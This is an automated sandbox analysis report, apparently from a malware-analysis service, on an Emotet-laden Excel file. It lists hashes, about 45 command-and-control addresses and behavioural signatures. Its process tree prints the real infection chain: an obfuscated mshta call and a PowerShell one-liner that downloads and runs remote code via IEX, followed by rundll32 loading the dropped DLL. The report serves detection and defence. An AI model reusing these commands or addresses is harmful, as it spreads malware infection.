Analysis
-
max time kernel
59s -
max time network
51s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
28-01-2022 02:39
Behavioral task
behavioral1
Sample
2022-1-28-5cebfe367350577ffb538c70903fd827.xls
Resource
win7-en-20211208
General
-
Target
2022-1-28-5cebfe367350577ffb538c70903fd827.xls
-
Size
47KB
-
MD5
5cebfe367350577ffb538c70903fd827
-
SHA1
aa64391e91664013f600192b910f862f31ae5c63
-
SHA256
5ef52f4f5deb0e152aa64b4caf544485ce1e2e6b9c492cf7d317668fb3783d4e
-
SHA512
70ff6ad683f185f757509b569b8d7b91db614fbd39cce5da3d814f6a6ea56b3c5ed0438cef3da03f411a5e828a013af5633a3301cc90f4f319d36b2b836d2514
Malware Config
Extracted
http://91.240.118.168/vvv/ppp/fe.html
Extracted
http://91.240.118.168/vvv/ppp/fe.png
Extracted
emotet
Epoch4
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
CMD.EXEdescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3404 2652 CMD.EXE EXCEL.EXE -
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 34 3596 mshta.exe 39 3776 powershell.exe 41 3776 powershell.exe 48 2484 rundll32.exe 49 2484 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 2284 rundll32.exe 3788 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Ofcylinlkzmzzaju\wenp.qya rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2648 3596 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2652 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 3776 powershell.exe 3776 powershell.exe 3776 powershell.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2648 WerFault.exe 2484 rundll32.exe 2484 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3776 powershell.exe Token: SeDebugPrivilege 2648 WerFault.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE 2652 EXCEL.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
EXCEL.EXECMD.EXEmshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2652 wrote to memory of 3404 2652 EXCEL.EXE CMD.EXE PID 2652 wrote to memory of 3404 2652 EXCEL.EXE CMD.EXE PID 3404 wrote to memory of 3596 3404 CMD.EXE mshta.exe PID 3404 wrote to memory of 3596 3404 CMD.EXE mshta.exe PID 3596 wrote to memory of 3776 3596 mshta.exe powershell.exe PID 3596 wrote to memory of 3776 3596 mshta.exe powershell.exe PID 3776 wrote to memory of 1536 3776 powershell.exe cmd.exe PID 3776 wrote to memory of 1536 3776 powershell.exe cmd.exe PID 1536 wrote to memory of 2284 1536 cmd.exe rundll32.exe PID 1536 wrote to memory of 2284 1536 cmd.exe rundll32.exe PID 1536 wrote to memory of 2284 1536 cmd.exe rundll32.exe PID 2284 wrote to memory of 3788 2284 rundll32.exe rundll32.exe PID 2284 wrote to memory of 3788 2284 rundll32.exe rundll32.exe PID 2284 wrote to memory of 3788 2284 rundll32.exe rundll32.exe PID 3788 wrote to memory of 1276 3788 rundll32.exe rundll32.exe PID 3788 wrote to memory of 1276 3788 rundll32.exe rundll32.exe PID 3788 wrote to memory of 1276 3788 rundll32.exe rundll32.exe PID 1276 wrote to memory of 2484 1276 rundll32.exe rundll32.exe PID 1276 wrote to memory of 2484 1276 rundll32.exe rundll32.exe PID 1276 wrote to memory of 2484 1276 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-5cebfe367350577ffb538c70903fd827.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMD.EXECMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://91.240.118.168/vvv/ppp/fe.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ofcylinlkzmzzaju\wenp.qya",xjAprKGuLS8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ofcylinlkzmzzaju\wenp.qya",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3596 -s 16604⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\QWER.dllMD5
91889bc1858d4b5983c747be7e47fae7
SHA189bd70beecf51a83f0e9632e361847fddc9cf7aa
SHA25623505b3556126c255502fe868283b2e93a0f5e051400c55d80c87a1e760c3be9
SHA5128dacda8b1cc46454c394ed4275166db3aad8c45b9fcc4a8a4719e3613cce2ace2d3c9c59c5ede2e50e80b49ab989960e6fe3509db6d2874d017d931452d027fd
-
\ProgramData\QWER.dllMD5
91889bc1858d4b5983c747be7e47fae7
SHA189bd70beecf51a83f0e9632e361847fddc9cf7aa
SHA25623505b3556126c255502fe868283b2e93a0f5e051400c55d80c87a1e760c3be9
SHA5128dacda8b1cc46454c394ed4275166db3aad8c45b9fcc4a8a4719e3613cce2ace2d3c9c59c5ede2e50e80b49ab989960e6fe3509db6d2874d017d931452d027fd
-
\ProgramData\QWER.dllMD5
91889bc1858d4b5983c747be7e47fae7
SHA189bd70beecf51a83f0e9632e361847fddc9cf7aa
SHA25623505b3556126c255502fe868283b2e93a0f5e051400c55d80c87a1e760c3be9
SHA5128dacda8b1cc46454c394ed4275166db3aad8c45b9fcc4a8a4719e3613cce2ace2d3c9c59c5ede2e50e80b49ab989960e6fe3509db6d2874d017d931452d027fd
-
memory/2284-596-0x0000000001300000-0x0000000001325000-memory.dmpFilesize
148KB
-
memory/2484-617-0x00000000008B0000-0x00000000008D5000-memory.dmpFilesize
148KB
-
memory/2484-619-0x0000000000900000-0x0000000000925000-memory.dmpFilesize
148KB
-
memory/2484-621-0x0000000000930000-0x0000000000955000-memory.dmpFilesize
148KB
-
memory/2484-624-0x0000000004920000-0x0000000004945000-memory.dmpFilesize
148KB
-
memory/2484-626-0x0000000004A00000-0x0000000004A25000-memory.dmpFilesize
148KB
-
memory/2484-628-0x0000000004AE0000-0x0000000004B05000-memory.dmpFilesize
148KB
-
memory/2484-630-0x0000000004CC0000-0x0000000004CE5000-memory.dmpFilesize
148KB
-
memory/2484-632-0x0000000004D20000-0x0000000004D45000-memory.dmpFilesize
148KB
-
memory/2652-117-0x00007FFF06850000-0x00007FFF06860000-memory.dmpFilesize
64KB
-
memory/2652-121-0x00007FFF06850000-0x00007FFF06860000-memory.dmpFilesize
64KB
-
memory/2652-118-0x00007FFF06850000-0x00007FFF06860000-memory.dmpFilesize
64KB
-
memory/2652-116-0x00007FFF06850000-0x00007FFF06860000-memory.dmpFilesize
64KB
-
memory/2652-128-0x00007FFF03D00000-0x00007FFF03D10000-memory.dmpFilesize
64KB
-
memory/2652-129-0x00007FFF03D00000-0x00007FFF03D10000-memory.dmpFilesize
64KB
-
memory/2652-115-0x00007FFF06850000-0x00007FFF06860000-memory.dmpFilesize
64KB
-
memory/3776-435-0x00000201A6E36000-0x00000201A6E38000-memory.dmpFilesize
8KB
-
memory/3776-308-0x00000201A6E33000-0x00000201A6E35000-memory.dmpFilesize
8KB
-
memory/3776-307-0x00000201A6E30000-0x00000201A6E32000-memory.dmpFilesize
8KB
-
memory/3776-306-0x00000201BFB70000-0x00000201BFBE6000-memory.dmpFilesize
472KB
-
memory/3776-295-0x00000201BF620000-0x00000201BF65C000-memory.dmpFilesize
240KB
-
memory/3776-276-0x00000201BF470000-0x00000201BF492000-memory.dmpFilesize
136KB
-
memory/3788-599-0x0000000001080000-0x00000000010A5000-memory.dmpFilesize
148KB
-
memory/3788-612-0x0000000004DC0000-0x0000000004DE5000-memory.dmpFilesize
148KB
-
memory/3788-610-0x0000000004C30000-0x0000000004C55000-memory.dmpFilesize
148KB
-
memory/3788-608-0x0000000004BD0000-0x0000000004BF5000-memory.dmpFilesize
148KB
-
memory/3788-606-0x0000000004B70000-0x0000000004B95000-memory.dmpFilesize
148KB
-
memory/3788-604-0x0000000004A90000-0x0000000004AB5000-memory.dmpFilesize
148KB
-
memory/3788-601-0x0000000001250000-0x0000000001275000-memory.dmpFilesize
148KB